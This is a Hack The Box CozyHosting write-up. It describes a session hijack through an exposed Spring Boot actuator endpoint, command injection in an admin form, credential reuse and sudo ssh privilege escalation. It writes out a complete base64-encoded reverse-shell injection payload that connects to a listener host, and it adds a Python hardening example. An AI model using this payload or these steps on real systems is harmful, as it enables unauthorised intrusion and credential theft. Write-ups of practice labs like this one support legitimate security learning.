Hack The Box - CozyHosting Writeup
kangwijen

CozyHosting is an easy Hack The Box challenge. In this article, I'll explain my process on how I pwned both the User and System.
Scanning & Enumeration
First, we run nmap to gather more information about our target. The scan shows that a website is hosted on the target.

To visit the website, we need to add its domain name to the hosts file on our machine. This allows our computer to recognize and access the site correctly. After this, we can access the website.

We checked the site and its source code but found nothing useful. To dig deeper, we tried directory scanning. DirBuster and Gobuster were too slow, so we switched to Dirsearch, which quickly found several directories.

One of the directories, /actuator, stood out. Visiting it returned an error page, and a quick Google search of that error showed that the website was built on the Spring Boot framework.

Most of the /actuator/ endpoints weren’t useful, except for /actuator/sessions, which looked interesting because it lists active session identifiers together with the user each session belongs to.

The login page sets a session cookie. Replacing its value with the session ID that /actuator/sessions listed for the user kanderson gave us access to the /admin page.

Exploitation
The admin page wasn’t very interesting, except for one form.

We tested different inputs and found that the hostname must be an IP address, so we used 127.0.0.1. For the username field, regular input caused a "Hostkey verification" error, but special characters like & and ; triggered a different error.

This suggested a command injection vulnerability, most likely in an ssh command the backend runs with the submitted values. We moved to Burp Suite for easier testing and used PayloadsAllTheThings and revshells to craft a reverse shell payload. To keep the payload free of characters the form would mangle, we base64-encoded it. The initial payload looked like this:

;c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNDEvNDQ0NCAwPiYx|base64 -d;

The semicolons terminate the surrounding command so that our own commands run after it. When we sent it, we got an error because of the whitespace. We fixed that with $IFS, which bash expands to its field separator (a space by default). It still didn’t work: the base64 string was being interpreted as a command name rather than as a string, so we added echo to pass it through the pipe as text:

;echo$IFS"c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNDEvNDQ0NCAwPiYx"|base64$IFS-d;

Still no connection, until we added |bash at the end to execute the decoded command:

;echo$IFS"c2ggLWkgPiYgL2Rldi90Y3AvMTAuMTAuMTQuNDEvNDQ0NCAwPiYx"|base64$IFS-d|bash;

With a netcat listener running, we got a shell.
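As an added example (not code from this writeup or from the CozyHosting application, whose backend is not shown), here is a Python reconstruction of the pattern the errors above imply: a hostname and username concatenated into an ssh command string, next to a hardened version that validates both fields and hands them to the process as an argument vector. The function names, the username policy and the ConnectTimeout option are assumptions.

```python
import ipaddress
import re
import shlex
import subprocess

# Assumed policy: POSIX portable user names only, so no shell metacharacters.
USERNAME_RE = re.compile(r"^[a-z_][a-z0-9_-]{0,31}$")


def vulnerable_command(hostname: str, username: str) -> str:
    """Hypothetical string-built command of the kind the writeup's errors imply.

    Run through `bash -c`, a username containing ';' or '|' becomes extra commands.
    """
    return f"ssh -o ConnectTimeout=5 {username}@{hostname} exit"


def shell_segments(command: str) -> int:
    """Count how many commands a POSIX shell would see in `command`.

    shlex with punctuation_chars turns ';', '|' and '&' into operator tokens, so
    a clean command yields 1 and an injected one yields more.
    """
    lexer = shlex.shlex(command, posix=True, punctuation_chars=True)
    lexer.whitespace_split = True
    operators = {";", "|", "&", "&&", "||", ";;", "|&"}
    return 1 + sum(1 for token in lexer if token in operators)


def validate_hostname(value: str) -> str:
    """The form only accepts IP literals; reject anything ipaddress cannot parse."""
    try:
        return str(ipaddress.ip_address(value))
    except ValueError as exc:
        raise ValueError(f"hostname must be an IP address: {value!r}") from exc


def validate_username(value: str) -> str:
    if not USERNAME_RE.fullmatch(value):
        raise ValueError(f"username has disallowed characters: {value!r}")
    return value


def safe_argv(hostname: str, username: str) -> list:
    """Hardened form: validated fields placed into an argv list, never a shell string."""
    target = f"{validate_username(username)}@{validate_hostname(hostname)}"
    return ["ssh", "-o", "ConnectTimeout=5", target, "exit"]


def run_safely(hostname: str, username: str) -> subprocess.CompletedProcess:
    # No shell=True: metacharacters in the arguments are never interpreted.
    return subprocess.run(safe_argv(hostname, username), capture_output=True, timeout=15)
```

The shape of the writeup's final payload (with the base64 swapped for a harmless string) makes the string-built command tokenize into five shell commands, while safe_argv rejects it with ValueError before anything runs.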

Lateral Movement
Now that we have shell access, we start looking for anything interesting, especially potential privilege escalation paths. However, this user cannot run sudo, and running linPEAS didn't reveal anything useful. We also can't access the "josh" user's home directory. But in the /app directory, we find a Java .jar file. To analyze it, we start a simple Python HTTP server on the target and download the file to our local machine.

A quick search leads us to a website that can open and decompile .jar files. After decompiling, we explore the contents and find nothing useful until we open a file named application.properties. This file contains PostgreSQL database credentials.

Trying to connect to the database remotely with psql doesn't work, likely because remote access is disabled. So we connect to the database locally through our reverse shell instead.

Once connected, we access the "cozyhosting" database and dump the tables. Inside, we find a "users" table. A simple SELECT * shows entries for both the "kanderson" user and an "admin" user.

To move forward, we need to identify and crack the password hashes. Using hashes.com, we identify the hash type as Blowfish. The site also has the plaintext password for the admin user, so we don't need to crack it ourselves.

We test the password and find that it works as the SSH password for the "josh" user. With that, we gain access and retrieve the User flag.

Privilege Escalation
Running sudo -l shows us the list of commands the user can run with sudo.

It turns out the user can run the ssh command with sudo. We use GTFOBins to find a way to escalate privileges through this.

By running the suggested command as the "josh" user, we successfully gain root access. To make the shell more stable, we upgrade it using Python.

Finally, we read the System flag located at /root.

That's all for this writeup, thank you for reading.